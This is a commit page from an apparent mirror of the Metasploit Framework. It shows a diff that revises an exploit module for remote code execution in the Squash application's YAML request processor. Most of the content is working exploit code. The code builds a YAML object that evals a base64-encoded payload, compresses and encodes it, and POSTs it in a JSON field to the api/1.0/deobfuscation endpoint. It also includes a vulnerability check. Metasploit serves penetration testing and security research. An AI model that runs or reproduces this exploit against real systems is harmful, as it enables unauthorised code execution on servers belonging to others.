infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding improvements based on Juan's feedback

bug/bundler_fix
Charlie Eriksen 2013-08-08 14:29:35 -04:00
parent 3a24765585
commit 1c6e994fe8
1 changed files with 10 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/exploits/unix/webapp/squash_yaml_exec.rb
View File

@ -7,7 +7,6 @@
require 'msf/core'
require 'zlib'
require 'base64'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@ -16,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Squash YAML Code Exec',
'Name' => 'Squash YAML Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
YAML request processor of the Squash application.
@ -49,10 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
def check
response = send_request_cgi({
'uri' => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
'uri' => normalize_uri(target_uri.path, '/api/1.0/deobfuscation'),
'method' => 'POST',
'ctype' => 'application/json',
}, 30)
})
if response.code == 422
print_status("Got HTTP 422 result, target may be vulnerable")
return Exploit::CheckCode::Appears
@ -63,15 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
code = Rex::Text.encode_base64(payload.encoded)
yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
payload = Base64.encode64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
"'#{rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
payload = Rex::Text.encode_base64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
data = "{\"api_key\":\"1\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"
send_request_cgi({
'uri' => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
'uri' => normalize_uri(target_uri.path, '/api/1.0/deobfuscation'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => data
}, 30)
})
end
end